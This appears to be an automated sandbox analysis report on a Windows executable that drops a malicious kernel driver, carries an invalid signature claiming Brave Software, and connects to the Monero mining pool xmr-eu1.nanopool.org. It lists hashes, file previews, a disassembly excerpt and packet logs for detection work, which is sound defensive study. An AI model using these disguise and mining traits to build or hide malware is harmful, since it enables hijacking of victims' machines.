                                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                Malicious:false
                                                                Preview:@...e................................................@..........

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjm4xeu2.ool.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtezdwaf.ny4.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2hlbiab.5ws.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjrtjmbh.5lc.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1510207563435464
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulvX/Z:NllUvX
                                                                MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                                                SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                                                SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                                                SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                                                Malicious:false
                                                                Preview:@...e................................................@..........

                                                                C:\Windows\Temp\__PSScriptPolicyTest_3rbrwd3u.oe4.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_b1xyt0mh.cjq.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_d3wcx4uy.3bm.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_t5l1qo2s.4tf.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\hnkcgwelkfzn.sys

                                                                Download File
                                                                Process:C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):14544
                                                                Entropy (8bit):6.2660301556221185
                                                                Encrypted:false
                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Joe Sandbox View:
                                                                • Filename: 1mqzOM6eok.exe, Detection: malicious, Browse
                                                                • Filename: updater.exe, Detection: malicious, Browse
                                                                • Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse
                                                                • Filename: LnK0dS8jcA.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: S0FTWARE.exe, Detection: malicious, Browse
                                                                • Filename: Gw2G72kSsY.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Entropy (8bit):6.559876563234829
                                                                TrID:
                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:aA45th2ixY.exe
                                                                File size:2'684'712 bytes
                                                                MD5:6694e88cd0b76e774385e450b3027f35
                                                                SHA1:5049c878bbbbfbeee9a38489086cb77a94c8f663
                                                                SHA256:40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e
                                                                SHA512:b404e98f602fa09d22b08065af32feacbe8c96c9dbf677e50bb420cd80cb217864a1564f7a931fc747e78aeff3691ea1e6d3a58acfdddfaa234e21d5b43c14fd
                                                                SSDEEP:49152:3GP12M443HsaixDif+GwpQ0WoIujEmXZpD3F93lRg7OE+Goqe1HFl:2m6HsaCDifuZW1cEIpZ93l3EylPl
                                                                TLSH:60C53344E66773FAE202803C5E4B4EA41450EA83E718D5E7DFDEB1691F316C2B578A83
                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......z....(.....@..........@..............................)...........`........................................

                                                                File Icon

                                                                Icon Hash:2f232d67b7934633

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x140001140
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x140000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6702ECD2 [Sun Oct 6 20:02:26 2024 UTC]
                                                                TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:de41d4e0545d977de6ca665131bb479a

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 28/05/2024 01:00:00 07/08/2027 00:59:59
                                                                Subject Chain
                                                                • CN="Brave Software, Inc.", O="Brave Software, Inc.", L=San Francisco, S=California, C=US
                                                                Version:3
                                                                Thumbprint MD5:9556B0EC482251182975F452FB6EFFBC
                                                                Thumbprint SHA-1:F8AC5F11DE7E26383B7A389FC19A2613835799D7
                                                                Thumbprint SHA-256:605F451998D85EFB906F1D062B20DE8BE591F69588C68F0226CE8A64EF27213F
                                                                Serial:0E982FDDF06E93E911065D037D4DD482

                                                                Entrypoint Preview

                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [00007ED5h]
                                                                mov dword ptr [eax], 00000001h
                                                                call 00007FE02D20A24Fh
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                inc ecx
                                                                push edi
                                                                inc ecx
                                                                push esi
                                                                push esi
                                                                push edi
                                                                push ebx
                                                                dec eax
                                                                sub esp, 20h
                                                                dec eax
                                                                mov eax, dword ptr [00000030h]
                                                                dec eax
                                                                mov edi, dword ptr [eax+08h]
                                                                dec eax
                                                                mov esi, dword ptr [00007EC9h]
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007FE02D20A270h
                                                                dec eax
                                                                cmp edi, eax
                                                                je 00007FE02D20A26Bh
                                                                dec esp
                                                                mov esi, dword ptr [00009691h]
                                                                nop word ptr [eax+eax+00000000h]
                                                                mov ecx, 000003E8h
                                                                inc ecx
                                                                call esi
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007FE02D20A247h
                                                                dec eax
                                                                cmp edi, eax
                                                                jne 00007FE02D20A229h
                                                                dec eax
                                                                mov edi, dword ptr [00007E90h]
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007FE02D20A24Eh
                                                                mov ecx, 0000001Fh
                                                                call 00007FE02D211824h
                                                                jmp 00007FE02D20A269h
                                                                cmp dword ptr [edi], 00000000h
                                                                je 00007FE02D20A24Bh
                                                                mov byte ptr [00287BF9h], 00000001h
                                                                jmp 00007FE02D20A25Bh
                                                                mov dword ptr [edi], 00000001h
                                                                dec eax
                                                                mov ecx, dword ptr [00007E7Ah]
                                                                dec eax
                                                                mov edx, dword ptr [00007E7Bh]
                                                                call 00007FE02D21181Bh
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007FE02D20A25Bh
                                                                dec eax
                                                                mov ecx, dword ptr [00007E50h]

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa5600x3c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x28d0000x2920.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x28a0000x180.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x28ac000x4b28
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2900000x78.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xa6f80x158.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x79360x7a007f844f0d18857f7d7e2eab8d23f9d60aFalse0.5107261782786885data6.167987156989157IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x90000x1ca80x1e00f2e1668034c63ecc2018bff4b19c0fd9False0.44453125zlib compressed data4.620260658891028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xb0000x27ecc00x27de0095c8f148d44b28914e5eb7559800b8ccunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .pdata0x28a0000x1800x200af7ee56e1eb3d632f98b21a0f767758eFalse0.50390625data3.116854587874261IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .00cfg0x28b0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .tls0x28c0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x28d0000x29200x2a00f3287749d7c12227ad106e56ca8e7c3aFalse0.34337797619047616data4.712245111111924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x2900000x780x200a814f48e33b52f50f5f1efb22c555aa7False0.232421875data1.425440595329436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x28d1900x128Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colorsEnglishUnited States0.6317567567567568
                                                                RT_ICON0x28d2b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.5823699421965318
                                                                RT_ICON0x28d8200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colorsEnglishUnited States0.5120967741935484
                                                                RT_ICON0x28db080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5455776173285198
                                                                RT_ICON0x28e3b00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.36341463414634145
                                                                RT_ICON0x28ea180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.42350746268656714
                                                                RT_GROUP_ICON0x28f8c00x5adataEnglishUnited States0.7333333333333333

                                                                Imports

                                                                DLLImport
                                                                msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 7, 2024 01:38:15.561387062 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:15.566363096 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:15.566458941 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:15.566792011 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:15.571985006 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:16.177416086 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:16.177484989 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:16.177622080 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:16.178919077 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:16.184526920 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:16.352392912 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:16.392839909 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:16.485277891 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:16.533444881 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:16.928128004 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:16.970966101 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:27.037245035 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:27.189677954 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:27.303270102 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:27.303327084 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:37.048710108 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:37.095938921 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:47.120719910 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:47.175259113 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:38:57.060861111 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:38:57.111604929 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:39:07.080383062 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:39:07.127281904 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:39:17.113078117 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:39:17.158498049 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:39:27.062779903 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:39:27.127265930 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:39:37.072770119 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:39:37.127264023 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:39:47.167924881 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:39:47.221062899 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:39:57.092214108 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:39:57.189781904 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:40:07.958962917 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:40:07.959223986 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:40:07.959269047 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:40:07.959378004 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:40:07.959418058 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:40:17.134417057 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:40:17.300462008 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:40:40.127126932 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:40:40.205518007 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:40:50.144165993 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:40:50.189850092 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:41:00.126502037 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:41:00.189894915 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:41:10.128703117 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:41:10.205481052 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:41:27.262511969 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:41:27.486773968 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:41:37.135536909 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:41:37.190383911 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:41:47.206312895 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:41:47.299273968 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:41:57.122370958 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:41:57.299283028 CEST4973110343192.168.2.451.15.58.224
                                                                Oct 7, 2024 01:42:16.214936972 CEST103434973151.15.58.224192.168.2.4
                                                                Oct 7, 2024 01:42:16.299315929 CEST4973110343192.168.2.451.15.58.224

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 7, 2024 01:38:15.549998999 CEST4930353192.168.2.41.1.1.1
                                                                Oct 7, 2024 01:38:15.557410002 CEST53493031.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 7, 2024 01:38:15.549998999 CEST192.168.2.41.1.1.10x3e60Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 01:38:15.557410002 CEST1.1.1.1192.168.2.40x3e60No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:19:38:07
                                                                Start date:06/10/2024
                                                                Path:C:\Users\user\Desktop\aA45th2ixY.exe
